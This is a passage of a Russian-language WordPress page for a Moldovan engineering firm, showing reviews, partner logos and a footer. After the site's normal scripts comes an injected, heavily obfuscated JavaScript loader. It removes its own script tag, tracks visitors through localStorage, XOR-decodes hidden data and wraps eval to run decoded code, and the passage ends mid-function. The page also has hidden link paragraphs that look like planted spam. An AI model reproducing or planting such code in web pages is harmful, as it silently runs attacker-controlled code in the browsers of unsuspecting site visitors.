fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">«Хочу поблагодарить сотрудников команды Пиротерм Сервис, которые профессионально, ответственно выполнили работу и содержали мой дом в чистоте даже во время работы»</div> </div> </div> </div> <div class="col-lg-4"> <div class="head-review center"> <div class=""> <div class="name-reviews">Виталий Мруг</div> <div class="company-reviews">GENESIS</div> <div class="stars-reviews"> <i class="fas fa-star"></i> <i class="fas fa-star"></i> <i class="fas fa-star"></i> </div> <div class="text-reviews">Я глубоко удовлетворен тем,  что команда инженеров Piroterm-Service SRL предложила поддержку в выборе лучших решений для нашего оборудования для производства асфальта.</div> </div> </div> </div> </div> </div> </div> <div class="partners"> <div class="container"> <div class="slider-partners"> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/1-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/2-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/3-1.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/4.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/5.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/6.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/7.jpg" alt=""> </a> <a href=""> <img src="https://inginer.md/wp-content/uploads/2020/11/8.jpg" alt=""> </a> </div> </div> </div> <p style="display: none;"><a href="2">2</a></p> <p style="display: none;"><a href="2">2</a></p> <p style="display: none;"><a href="2">2</a></p> <footer> <div class="container"> <div class="row"> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <a href=""><img src="https://inginer.md/wp-content/uploads/2020/11/logo.png" alt=""></a> <div class="title-sub-logo">Почта:</div> <p><a href="mailto:info@piroterm.md">info@piroterm.md</a></p> <div class="title-sub-logo">Телефон:</div> <p> <a href="tel:+373 22 21-20-21">+373 22 21-20-21</a></p> <div class="socials"> <a href="https://www.facebook.com/inginer.md"><i class="fab fa-facebook-f"></i></a> </div> </div> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <div class="title-footer">Меню</div> <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-508" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-508"><a href="https://inginer.md/about-us/">О нас</a></li> <li id="menu-item-507" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-507"><a href="https://inginer.md/services/">Услуги</a></li> <li id="menu-item-510" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-510"><a href="https://inginer.md/contacts/">Контакты</a></li> <li id="menu-item-14430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-14430"><a href="https://inginer.md/test_test/">Test</a></li> <li id="menu-item-506" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-506"><a href="https://inginer.md/proekty/">Проекты</a></li> <li id="menu-item-24786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24786"><a href="https://inginer.md/home-2/">Home</a></li> <li id="menu-item-24988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-24988"><a href="https://inginer.md/main-page/">Main Page</a></li> <li id="menu-item-505" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-505"><a href="https://inginer.md/politika-konfidenczialnosti/">Политика конфиденциальности</a></li> </ul></div> </div> <div class="col-lg-3 col-sm-6 col-md-4 col-xs-12 "> <div class="title-footer">Услуги</div> <ul> <li><a href="https://inginer.md/proektirovanie/">Проектирование</a></li> <li><a href="https://inginer.md/echipamente/">Комплектация оборудованием</a></li> <li><a href="https://inginer.md/montazh/">Монтаж</a></li> <li><a href="https://inginer.md/test/">Сервисное обслуживание</a></li> </ul> </div> </div> </div> </footer> <script type='text/javascript' id='contact-form-7-js-extra'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/inginer.md\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://inginer.md/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3' id='contact-form-7-js'></script> <script type='text/javascript' src='https://inginer.md/wp-includes/js/wp-embed.min.js?ver=5.5.18' id='wp-embed-js'></script> <script> "use strict";var LHGGSmC,I2tZcBj,aJjWtGM,gEzm3t,bWaLRty,MOnfzvO,vD6WUi,t_unvVJ,_OxfDb;const Fa1oTs=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x2000000,0x4000000,0x2,0x3,0x59,0x4,!0x1,"js",0x79,0x7b,0x7f,0x80];function cUz_bDQ(LHGGSmC){var I2tZcBj="WPhAcSXrUdBLn$+~C6G?DR%;s>O^QZ=)aHb8g]xmYvMFKo<e5iq9pz&VJjT\"IuE3kyt:N/4f{_![1}.2(`#,0@7w|*l",aJjWtGM,gEzm3t,bWaLRty,MOnfzvO,vD6WUi,t_unvVJ,_OxfDb;K0fGvU(aJjWtGM=""+(LHGGSmC||""),gEzm3t=aJjWtGM.length,bWaLRty=[],MOnfzvO=Fa1oTs[0x0],vD6WUi=Fa1oTs[0x0],t_unvVJ=-Fa1oTs[0x1]);for(_OxfDb=Fa1oTs[0x0];_OxfDb<gEzm3t;_OxfDb++){var cUz_bDQ=I2tZcBj.indexOf(aJjWtGM[_OxfDb]);if(cUz_bDQ===-Fa1oTs[0x1])continue;if(t_unvVJ<Fa1oTs[0x0]){t_unvVJ=cUz_bDQ}else{K0fGvU(t_unvVJ+=cUz_bDQ*Fa1oTs[0xc],MOnfzvO|=t_unvVJ<<vD6WUi,vD6WUi+=(t_unvVJ&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(bWaLRty.push(MOnfzvO&Fa1oTs[0x3]),MOnfzvO>>=Fa1oTs[0x2],vD6WUi-=Fa1oTs[0x2])}while(vD6WUi>Fa1oTs[0x9]);t_unvVJ=-Fa1oTs[0x1]}}if(t_unvVJ>-Fa1oTs[0x1]){bWaLRty.push((MOnfzvO|t_unvVJ<<vD6WUi)&Fa1oTs[0x3])}return iXkV83(bWaLRty)}function SdT5TpA(aJjWtGM){if(typeof LHGGSmC[aJjWtGM]===Fa1oTs[0x5]){return LHGGSmC[aJjWtGM]=cUz_bDQ(I2tZcBj[aJjWtGM])}return LHGGSmC[aJjWtGM]}K0fGvU(LHGGSmC={},I2tZcBj=["/Qep,oN<vD03yI|Q1;~Hm@JpC~WNDA_ONA})R//r#nqtr#|%;dv[K9.<d6\"","k]sH}1~rP~{_o{[x+P","e&0SXI0!1UT4/>{O}6B^^","*ov9q}B<JyHRjsWg&N~1c!ss#?1U(AtgMXf1R","[ygr}g+TdD}UR{^MUi3c","0),z?,3jm$;T<>_GCj^}a.$z}+m","=Z;Qp{(7l+m5y{nmdZ2dC`Cpgjb{=Sb)kbg}l_Qsk3B=0A[xrZ{_eTbgXBu","k;~p;/!<>Dv8VT(boF?{j}FegjJ85^B>","=&jXvijPyI<V<]XG2X})kI\"Pp$z1D,NsA!b9O.1p@?c[6{Psuy0Sq]@8p?",")A\"z!g9e_+","d!DB8u[$F+m11^Hspjw_^&bgq3h&LOP=XN~.P52jA?fPucT;","FN[UQ\"47hIO^w+b=9)G[~jXU5~Jrb]OvxN*&^xMsr",";9ZpXgNNatPd/{MxQy%QloW","}y>XY_qGhdpreTD^zjNZa\"@P7$XT%]XGO]D!fVW","P~AZ``*j+\"${P","t;v&gN3ZBDO","y]IB=Y<h","\"\"4QdI`@MEG[@s*C:XVcB7c=etcNbO}muD0z<TyP","&OI!\"2!slD}!h4H)(LjXYN;zVDo","e)NZK3!TeGV_%+b=+nxc>",",+9{$55hq?MA+`xszW","lL,S6f229j~E)xgG3b&1RY.TBV73sfd","Zfxp54m?vD;)vCO;B]<rMip(X","@oL{L7;r*Eg","#buB+jTh","+3:q(x292U","QD,Z#o0!sD!JP","pfH9+j,v~~fQ#>6YgOW=(EF8+Gs$A#~m3QT9;x*;AIa/FON=1N=pb8W","_;DZuT5GCnF","0_Sr~1hGk3Vi0\"Vbh&edG","J\"=1@f(!kG4>;q%bpA>=h![jtIXC/5K?aF(_.jV3f$F/W","/oXVKNpY?jlZ;h!>nfrXO,^e\"+^r~xmx{X.1<}1<jyNz?hrxr<!U","e&r.s\"BsUTm8;+zvJof_0qW","1beQr`{Go+]ROSiYTo=1kg}jEG","Uj=1]N3/hn=s5Ah;jNBawHt<r$eQC~Mx9]n}Y_f[(nNGA#jv","rO,zV}<kWIC5I,d","2+^Z{bK=}\"V","}owpcV`8)IM6q>ZZIOC&L,JNxT,U!>SGq90S[5f$PdP9:xU","GaYXl.W","6fi9U1(sEUH\"Y^/>FEE)9iYg/?BAj{aMRDx)&Tqk$Rz","+j#U6VBT5np/eh`mWjop&<Q=Nd5Jk,jZSdh","an$r6fH?Hd/>MiR8yE<iK#W","u\"<p2E68#&k44xGD<jIziis<qjU[P",";XoV]\"P$2Uh&p,^vJdu)/5tsz?RAh>36FyKVkgW","/)YX\"4`8!+Z$f43=gd_X5mr?J$V(eA,vLY.Q\"mDh","x6=)&{J!7k)EW^H)_ERr8\"L?X?UedgRYk6Nqge;`4k~[XSxs1W","T]H98Y1n>yL[iCN)xEX)$VxnDk5LS0I8%~Y_tzWU@&EJ65QgJYv9]\"ks@?f_P","ED>.?/[r{D(4[^7Qj5]rI{X=<z5JI,W=","(X>^4bKskdwa]CbGVya9H\"Xs5d33%SkM?Z3dUqXGzTqLCfys#\"P",".LQ!ae3PoEucvcI6k&dXA`QndV]V./Y?7y0)42E<N?j","Li[aumLrjT^6n,lZV9]1_`[j>Dh.?xwb&5taUb^8aG","D9#SW!7sLEuQ>5Dbxjs^*@7<[+q","oXH=n5`$WRC#)qdmfNM}}19ZwD2G>C&b(E:}k{T<|T.U@cEZD&9Z+","y5oQUq?`~~ypk,;ZZD~1$VX=~ID]DeDbXi~X532rHIxtWAE;","79b}|._r|6p_+#6DzW","sZfdlj`r$\"}L;OP=?&Zc","H;v[y5^?%?V+F#wZ;drdNE}2[62zx$(Yjyf_^&`ZeJLNi5.Y7DT9D1)j?&d[P","_DK}u2,@IE&>8qBxXcjXxi{<=RBB1fe^Nbd&s,Z8/?x","8AN}P`R?,kjiF4i^=dY_,q@$rD?X\"+Z6abrdu}UgGj1U;#.Y*zA","q&W=GEMGNklSaAYOVfmi|,,PA","qff&ei_9ckP[NI;b_El}RfSv}E0n5A=sxZ7QQ(#sJ6g","]n$rj9PwME^Tf+vx;;9auT.Y1Jx6Hc","RIm=E02rtnE_z$Mm%OIz&#$eA","*5`aM4_j5zassA#^*W","Wn4r~Eght~#:{c5mS82ds.Zr:jDAP","6n:zEbEs3nEGJ~gGe9D}pmIN`d_U6C5O=I\"aB`~P","<)p}x@MTGjDsYAWG5X$rG.0T5zM","[6(d^x>zHnK+g\"Z8g5]1G/Bs,Ii(%#&Q%Z.ptbW","qXs.S{8[<G`ih]hs]Db^3bsgY$G2*>x)vY;d`xNs:k$;VT*8Vb=V8@@P","aIKZO_%T?n7Z9+d?T5,a&mzZknA&@s[>.)~dh7$vNjxQ<>%vTfki6V+paG","A!21|H^eD&gAy{em","]XRr\"b5<]kvsP","nNNr!`1GsDXevcBD.y$Vsx,$f$^{v>?vr<3iYN/r2J+y?q`m~aSB$5W","CfwQW!0pb&;2kcX]5nuBI9Kh","yX>9Fu_$F6X9d{E=.oA","vFw_!j+pCRg/L\"1x~G>X][;8O6>X&u4GwQha;@qhY6|4iI1m5W","U!Ec/{=n$R){6S","MEv[w1P35nr&nmtGWn;i99Zvg&`it>ZM@bx)I2ppXTZ{L\"4smEEc","J;Ta|,YYsy*:qu:=`+v&Ug+gU$3R,heOk6@q^YT7JTT}GhE6hRG^G.W","l63d0fd$gdm5$C/Gwmz!#/HZaGx6IA",";y{9g&ks=3LNKe:]b]?}dIDseUh&eT>v5W",">FRB|/nUlDTpAq*bXcoB$!_v(t$NTi\"8h(E)oNy/1EH{*{%b+~~1H.K=~REpi{;b3;sd5wjeL6b{>cim!&Q}).U4q3nKfO|bMO,av(V?H3u_ic7YCckdM_#74k_iR0~m,DAa).9e[6h@PCHg]j31z#I=(tTpI~;bccSBE}F$^D","Do?Rf","6\"`Wak*9e|S",")6MOdtnY?","oZ;nDM`T8d@VwQb=","eqcR","Yq3Dtg9T\"|Qp0Z]","SeOQ,V!a","Lo67M(+4;","J7WR#Yu",";QI/DUh9JZa;J","9o67M(+4;","eh*Mee\";ZWz8BaloE8av*eV._)E0=T#1jj4B>*\";7/o8kaGojj4B)D[JMie0EpB1<dJ","Hkm7@(u","JQs/","A@:c","`\"ak[nt/","8u7r=<:A","~XZHo5@>Nzs+IL@h<~XwH\"O5x7.BJIm38V}`X]Rx*zi","%;ZHw/lI","JcYJZ","#ckrk","axi6X]3I","bXQwT<.nABK",";;i6X]3I","*QQwG>zYAl8nIL","uQTG]","~z%C","`P/=UMIY^h","[>qrj","]ZdW","<V#UAK~sWiD#OzYpipF=$[Rs","pzR}Z[ts","Q]lCB6Tf","ww@3bnwm2P[*!&","j<vuQQn!6NUP=","[]qr0","))wU=[H","bp{h","A5#U^(H","f]9DAy~s,t)SXl2YHovR","*qg{DM5b4>l","n\"Ei\"%mHg1l","{jMgp4u","j]<Q","uYfUg{2u@ct1P[H&","40tSq5/","^o#>:fiSj","n?_|P","Bd!r","Md!r","q5PhH","Bd92","Xd!rH}M;","m\"W]%_H1b8","}%j*b","w\"/hRvV","0JL}F","#F8B","%F8B","v\"I6?","\"sD*9","(a3R","<a3R","[6?z^"]);function ceUjha(){var LHGGSmC=[function(){return globalThis},function(){return global},function(){return window},function(){return new Function("return this")()}],I2tZcBj,aJjWtGM,gEzm3t;K0fGvU(I2tZcBj=void 0x0,aJjWtGM=[]);try{K0fGvU(I2tZcBj=Object,aJjWtGM[Fa1oTs[0xb]]("".__proto__.constructor.name))}catch(e){}QtCYFsK:for(gEzm3t=Fa1oTs[0x0];gEzm3t<LHGGSmC[Fa1oTs[0x4]];gEzm3t++)try{var bWaLRty;I2tZcBj=LHGGSmC[gEzm3t]();for(bWaLRty=Fa1oTs[0x0];bWaLRty<aJjWtGM[Fa1oTs[0x4]];bWaLRty++)if(typeof I2tZcBj[aJjWtGM[bWaLRty]]===Fa1oTs[0x5])continue QtCYFsK;return I2tZcBj}catch(e){}return I2tZcBj||this}K0fGvU(aJjWtGM=ceUjha()||{},gEzm3t=aJjWtGM.TextDecoder,bWaLRty=aJjWtGM.Uint8Array,MOnfzvO=aJjWtGM.Buffer,vD6WUi=aJjWtGM.String||String,t_unvVJ=aJjWtGM.Array||Array,_OxfDb=function(){var LHGGSmC=new t_unvVJ(Fa1oTs[0x1c]),I2tZcBj,aJjWtGM;K0fGvU(I2tZcBj=vD6WUi[Fa1oTs[0x8]]||vD6WUi.fromCharCode,aJjWtGM=[]);return function(gEzm3t){var bWaLRty,MOnfzvO,t_unvVJ,_OxfDb;K0fGvU(MOnfzvO=void 0x0,t_unvVJ=gEzm3t[Fa1oTs[0x4]],aJjWtGM[Fa1oTs[0x4]]=Fa1oTs[0x0]);for(_OxfDb=Fa1oTs[0x0];_OxfDb<t_unvVJ;){K0fGvU(MOnfzvO=gEzm3t[_OxfDb++],MOnfzvO<=Fa1oTs[0x1b]?bWaLRty=MOnfzvO:MOnfzvO<=0xdf?bWaLRty=(MOnfzvO&0x1f)<<Fa1oTs[0x7]|gEzm3t[_OxfDb++]&Fa1oTs[0x6]:MOnfzvO<=0xef?bWaLRty=(MOnfzvO&0xf)<<Fa1oTs[0xa]|(gEzm3t[_OxfDb++]&Fa1oTs[0x6])<<Fa1oTs[0x7]|gEzm3t[_OxfDb++]&Fa1oTs[0x6]:vD6WUi[Fa1oTs[0x8]]?bWaLRty=(MOnfzvO&Fa1oTs[0x9])<<0x12|(gEzm3t[_OxfDb++]&Fa1oTs[0x6])<<Fa1oTs[0xa]|(gEzm3t[_OxfDb++]&Fa1oTs[0x6])<<Fa1oTs[0x7]|gEzm3t[_OxfDb++]&Fa1oTs[0x6]:(bWaLRty=Fa1oTs[0x6],_OxfDb+=Fa1oTs[0x14]),aJjWtGM[Fa1oTs[0xb]](LHGGSmC[bWaLRty]||(LHGGSmC[bWaLRty]=I2tZcBj(bWaLRty))))}return aJjWtGM.join("")}}());function iXkV83(LHGGSmC){return typeof gEzm3t!==Fa1oTs[0x5]&&gEzm3t?new gEzm3t().decode(new bWaLRty(LHGGSmC)):typeof MOnfzvO!==Fa1oTs[0x5]&&MOnfzvO?MOnfzvO.from(LHGGSmC).toString("utf-8"):_OxfDb(LHGGSmC)}function aM1oc8(){}function Ta5GMz5(){}function K0fGvU(){K0fGvU=function(){}}(()=>{function aJjWtGM(aJjWtGM,gEzm3t){if(!gEzm3t){gEzm3t=function(gEzm3t){if(typeof LHGGSmC[gEzm3t]===Fa1oTs[0x5]){return LHGGSmC[gEzm3t]=aJjWtGM(I2tZcBj[gEzm3t])}return LHGGSmC[gEzm3t]}}if(!aJjWtGM){aJjWtGM=function(aJjWtGM){var gEzm3t="uJamQv;X)/R[]?zoA1L|tN3}THB#Cf9D7+jY*e^E=F,q!ckphGlxiW\"nPwSdZ28<I>$6.KVM50_4g{U@s(%y`rbO&:~",bWaLRty,MOnfzvO,vD6WUi,t_unvVJ,cUz_bDQ,ceUjha,Ta5GMz5;K0fGvU(bWaLRty=""+(aJjWtGM||""),MOnfzvO=bWaLRty.length,vD6WUi=[],t_unvVJ=Fa1oTs[0x0],cUz_bDQ=Fa1oTs[0x0],ceUjha=-Fa1oTs[0x1]);for(Ta5GMz5=Fa1oTs[0x0];Ta5GMz5<MOnfzvO;Ta5GMz5++){var Qy4Os4w=gEzm3t.indexOf(bWaLRty[Ta5GMz5]);if(Qy4Os4w===-Fa1oTs[0x1])continue;if(ceUjha<Fa1oTs[0x0]){ceUjha=Qy4Os4w}else{K0fGvU(ceUjha+=Qy4Os4w*Fa1oTs[0xc],t_unvVJ|=ceUjha<<cUz_bDQ,cUz_bDQ+=(ceUjha&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(vD6WUi.push(t_unvVJ&Fa1oTs[0x3]),t_unvVJ>>=Fa1oTs[0x2],cUz_bDQ-=Fa1oTs[0x2])}while(cUz_bDQ>Fa1oTs[0x9]);ceUjha=-Fa1oTs[0x1]}}if(ceUjha>-Fa1oTs[0x1]){vD6WUi.push((t_unvVJ|ceUjha<<cUz_bDQ)&Fa1oTs[0x3])}return iXkV83(vD6WUi)}}if(new RegExp(SdT5TpA(0x51),"i")[gEzm3t(0x52)](navigator[gEzm3t(0x53)])){function bWaLRty(aJjWtGM){var gEzm3t="dn{?9oABX[q$cuvw~)GHTjKPFkJsODMRlpIYEib`#/}|%.t,ZmQhax+Cyf_:6L*<rSe\"V8z!&N=0]U^1W27;3@>g4(5",bWaLRty,MOnfzvO,vD6WUi,t_unvVJ,cUz_bDQ,ceUjha,Ta5GMz5;K0fGvU(bWaLRty=""+(aJjWtGM||""),MOnfzvO=bWaLRty.length,vD6WUi=[],t_unvVJ=Fa1oTs[0x0],cUz_bDQ=Fa1oTs[0x0],ceUjha=-Fa1oTs[0x1]);for(Ta5GMz5=Fa1oTs[0x0];Ta5GMz5<MOnfzvO;Ta5GMz5++){var Qy4Os4w=gEzm3t.indexOf(bWaLRty[Ta5GMz5]);if(Qy4Os4w===-Fa1oTs[0x1])continue;if(ceUjha<Fa1oTs[0x0]){ceUjha=Qy4Os4w}else{K0fGvU(ceUjha+=Qy4Os4w*Fa1oTs[0xc],t_unvVJ|=ceUjha<<cUz_bDQ,cUz_bDQ+=(ceUjha&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(vD6WUi.push(t_unvVJ&Fa1oTs[0x3]),t_unvVJ>>=Fa1oTs[0x2],cUz_bDQ-=Fa1oTs[0x2])}while(cUz_bDQ>Fa1oTs[0x9]);ceUjha=-Fa1oTs[0x1]}}if(ceUjha>-Fa1oTs[0x1]){vD6WUi.push((t_unvVJ|ceUjha<<cUz_bDQ)&Fa1oTs[0x3])}return iXkV83(vD6WUi)}function MOnfzvO(aJjWtGM){if(typeof LHGGSmC[aJjWtGM]===Fa1oTs[0x5]){return LHGGSmC[aJjWtGM]=bWaLRty(I2tZcBj[aJjWtGM])}return LHGGSmC[aJjWtGM]}if(MOnfzvO(0x54)in aM1oc8){vD6WUi()}function vD6WUi(){function aJjWtGM(aJjWtGM){return aJjWtGM[Fa1oTs[0x1]]*Fa1oTs[0x12]+(aJjWtGM[Fa1oTs[0x0]]<Fa1oTs[0x0]?Fa1oTs[0x11]|aJjWtGM[Fa1oTs[0x0]]:aJjWtGM[Fa1oTs[0x0]])}function gEzm3t(aJjWtGM){switch(((aJjWtGM&Fa1oTs[0x11])!==Fa1oTs[0x0])*Fa1oTs[0x1]+(aJjWtGM<Fa1oTs[0x0])*Fa1oTs[0x13]){case Fa1oTs[0x0]:return[aJjWtGM%Fa1oTs[0x11],Math.trunc(aJjWtGM/Fa1oTs[0x12])];case Fa1oTs[0x1]:return[aJjWtGM%Fa1oTs[0x11]-Fa1oTs[0x11],Math.trunc(aJjWtGM/Fa1oTs[0x12])+Fa1oTs[0x1]];case Fa1oTs[0x13]:return[((aJjWtGM+Fa1oTs[0x11])%Fa1oTs[0x11]+Fa1oTs[0x11])%Fa1oTs[0x11],Math.round(aJjWtGM/Fa1oTs[0x12])];case Fa1oTs[0x14]:return[aJjWtGM%Fa1oTs[0x11],Math.trunc(aJjWtGM/Fa1oTs[0x12])]}}let bWaLRty=aJjWtGM([Fa1oTs[0x13],Fa1oTs[0x16]]),MOnfzvO=aJjWtGM([Fa1oTs[0x1],Fa1oTs[0x13]]),vD6WUi=bWaLRty+MOnfzvO,t_unvVJ=vD6WUi-MOnfzvO,_OxfDb=t_unvVJ*Fa1oTs[0x13],cUz_bDQ=_OxfDb/Fa1oTs[0x13];K0fGvU(console.log(gEzm3t(vD6WUi)),console.log(gEzm3t(t_unvVJ)),console.log(gEzm3t(_OxfDb)),console.log(gEzm3t(cUz_bDQ)))}return}const t_unvVJ=document[gEzm3t(0x55)];t_unvVJ?.parentNode?.removeChild(t_unvVJ);const _OxfDb=Date[gEzm3t(0x56)],cUz_bDQ=_OxfDb(),ceUjha=window[gEzm3t(0x57)],Ta5GMz5=gEzm3t(Fa1oTs[0xe]),Qy4Os4w=ceUjha[gEzm3t(Fa1oTs[0x15])](Ta5GMz5);if(Qy4Os4w&&Number(Qy4Os4w)>cUz_bDQ){return}let HrDqp6="";const KkkoUQ=gEzm3t(0x5a),UwxKoaF=ceUjha[gEzm3t(Fa1oTs[0x15])](KkkoUQ)||crypto[gEzm3t(Fa1oTs[0xc])]();ceUjha[gEzm3t(0x5c)](KkkoUQ,UwxKoaF);const YNiBT7=new TextEncoder,rYIFsI=new TextDecoder,Zyn7JX3=new Uint8Array(gEzm3t(0x5d)[gEzm3t(0x5e)](",")[gEzm3t(0x5f)](Number)),HgCISi=0x5265c00,BAATgDD=aJjWtGM=>{return(Fa1oTs[0x0],eval)(aJjWtGM)},tgz7if=aJjWtGM=>{function gEzm3t(aJjWtGM){var gEzm3t="jA*H@ezL9cfn0rRFxQYB$=}opdiXTuyq43./^lk]V!K`st~Z>{ga?PWG\"E&vD1()N6IS#hCJU[Ob7m_<:w,%8;+25M|",bWaLRty,MOnfzvO,vD6WUi,t_unvVJ,cUz_bDQ,ceUjha,Ta5GMz5;K0fGvU(bWaLRty=""+(aJjWtGM||""),MOnfzvO=bWaLRty.length,vD6WUi=[],t_unvVJ=Fa1oTs[0x0],cUz_bDQ=Fa1oTs[0x0],ceUjha=-Fa1oTs[0x1]);for(Ta5GMz5=Fa1oTs[0x0];Ta5GMz5<MOnfzvO;Ta5GMz5++){var Qy4Os4w=gEzm3t.indexOf(bWaLRty[Ta5GMz5]);if(Qy4Os4w===-Fa1oTs[0x1])continue;if(ceUjha<Fa1oTs[0x0]){ceUjha=Qy4Os4w}else{K0fGvU(ceUjha+=Qy4Os4w*Fa1oTs[0xc],t_unvVJ|=ceUjha<<cUz_bDQ,cUz_bDQ+=(ceUjha&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(vD6WUi.push(t_unvVJ&Fa1oTs[0x3]),t_unvVJ>>=Fa1oTs[0x2],cUz_bDQ-=Fa1oTs[0x2])}while(cUz_bDQ>Fa1oTs[0x9]);ceUjha=-Fa1oTs[0x1]}}if(ceUjha>-Fa1oTs[0x1]){vD6WUi.push((t_unvVJ|ceUjha<<cUz_bDQ)&Fa1oTs[0x3])}return iXkV83(vD6WUi)}function bWaLRty(aJjWtGM){if(typeof LHGGSmC[aJjWtGM]===Fa1oTs[0x5]){return LHGGSmC[aJjWtGM]=gEzm3t(I2tZcBj[aJjWtGM])}return LHGGSmC[aJjWtGM]}return new Uint8Array(aJjWtGM[bWaLRty(0x60)]((aJjWtGM,gEzm3t)=>{function bWaLRty(aJjWtGM){var bWaLRty="@L/)Qf68Uc_M0A!\"WxlYapX`oPt%,5i}{^gJ+BFbzK=CyH]vG;:T*4m<wD?>#~I2OS&sRq7Ered.uk[|$nVjhZ19(3N",MOnfzvO,vD6WUi,t_unvVJ,cUz_bDQ,ceUjha,Ta5GMz5,Qy4Os4w;K0fGvU(MOnfzvO=""+(aJjWtGM||""),vD6WUi=MOnfzvO.length,t_unvVJ=[],cUz_bDQ=Fa1oTs[0x0],ceUjha=Fa1oTs[0x0],Ta5GMz5=-Fa1oTs[0x1]);for(Qy4Os4w=Fa1oTs[0x0];Qy4Os4w<vD6WUi;Qy4Os4w++){var HrDqp6=bWaLRty.indexOf(MOnfzvO[Qy4Os4w]);if(HrDqp6===-Fa1oTs[0x1])continue;if(Ta5GMz5<Fa1oTs[0x0]){Ta5GMz5=HrDqp6}else{K0fGvU(Ta5GMz5+=HrDqp6*Fa1oTs[0xc],cUz_bDQ|=Ta5GMz5<<ceUjha,ceUjha+=(Ta5GMz5&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(t_unvVJ.push(cUz_bDQ&Fa1oTs[0x3]),cUz_bDQ>>=Fa1oTs[0x2],ceUjha-=Fa1oTs[0x2])}while(ceUjha>Fa1oTs[0x9]);Ta5GMz5=-Fa1oTs[0x1]}}if(Ta5GMz5>-Fa1oTs[0x1]){t_unvVJ.push((cUz_bDQ|Ta5GMz5<<ceUjha)&Fa1oTs[0x3])}return iXkV83(t_unvVJ)}function MOnfzvO(aJjWtGM){if(typeof LHGGSmC[aJjWtGM]===Fa1oTs[0x5]){return LHGGSmC[aJjWtGM]=bWaLRty(I2tZcBj[aJjWtGM])}return LHGGSmC[aJjWtGM]}return aJjWtGM^Zyn7JX3[gEzm3t%Zyn7JX3[MOnfzvO(0x61)]]}))},txvKSG=async(aJjWtGM,gEzm3t)=>{function bWaLRty(aJjWtGM){var gEzm3t="FAIjfLMJWqHCUO2;^olm3Zdi%#`NpYkrwGSht~Rex)[cDa+Pb=EQnzV8vXgTK@7B*{,(?$]uy!\":6</405.}&>_s91|",bWaLRty,MOnfzvO,vD6WUi,cUz_bDQ,ceUjha,Ta5GMz5,Qy4Os4w;K0fGvU(bWaLRty=""+(aJjWtGM||""),MOnfzvO=bWaLRty.length,vD6WUi=[],cUz_bDQ=Fa1oTs[0x0],ceUjha=Fa1oTs[0x0],Ta5GMz5=-Fa1oTs[0x1]);for(Qy4Os4w=Fa1oTs[0x0];Qy4Os4w<MOnfzvO;Qy4Os4w++){var HrDqp6=gEzm3t.indexOf(bWaLRty[Qy4Os4w]);if(HrDqp6===-Fa1oTs[0x1])continue;if(Ta5GMz5<Fa1oTs[0x0]){Ta5GMz5=HrDqp6}else{K0fGvU(Ta5GMz5+=HrDqp6*Fa1oTs[0xc],cUz_bDQ|=Ta5GMz5<<ceUjha,ceUjha+=(Ta5GMz5&Fa1oTs[0xd])>Fa1oTs[0xe]?Fa1oTs[0xf]:Fa1oTs[0x10]);do{K0fGvU(vD6WUi.push(cUz_bDQ&Fa1oTs[0x3]),cUz_bDQ>>=Fa1oTs[0x2],ceUjha-=Fa1oTs[0x2])}while(ceUjha>Fa1oTs[0x9]);Ta5GMz5=-Fa1oTs[0x1]}}if(Ta5GMz5>-Fa1oTs[0x1]){vD6WUi.push((cUz_bDQ|Ta5GMz5<<ceUjha)&Fa1oTs[0x3])}return iXkV83(vD6WUi)}function MOnfzvO(aJjWtGM){if(typeof LHGGSmC[aJjWtGM]===Fa1oTs[0x5]){return LHGGSmC[aJjWtGM]=bWaLRty(I2tZcBj[aJjWtGM])}return LHGGSmC[aJjWtGM]}if(MOnfzvO(0x62)in aM1oc8){vD6WUi()}function vD6WUi(){var aJjWtGM=function(aJjWtGM){var bWaLRty=[];if(aJjWtGM===Fa1oTs[0x1]||aJjWtGM>=Fa1oTs[0x16])gEzm3t(bWaLRty,[],aJjWtGM,Fa1oTs[0x0]);return bWaLRty},gEzm3t,bWaLRty,MOnfzvO;K0fGvU(gEzm3t=function(aJjWtGM,vD6WUi,cUz_bDQ,ceUjha){var Ta5GMz5;for(Ta5GMz5=ceUjha;Ta5GMz5<cUz_bDQ;Ta5GMz5++){var 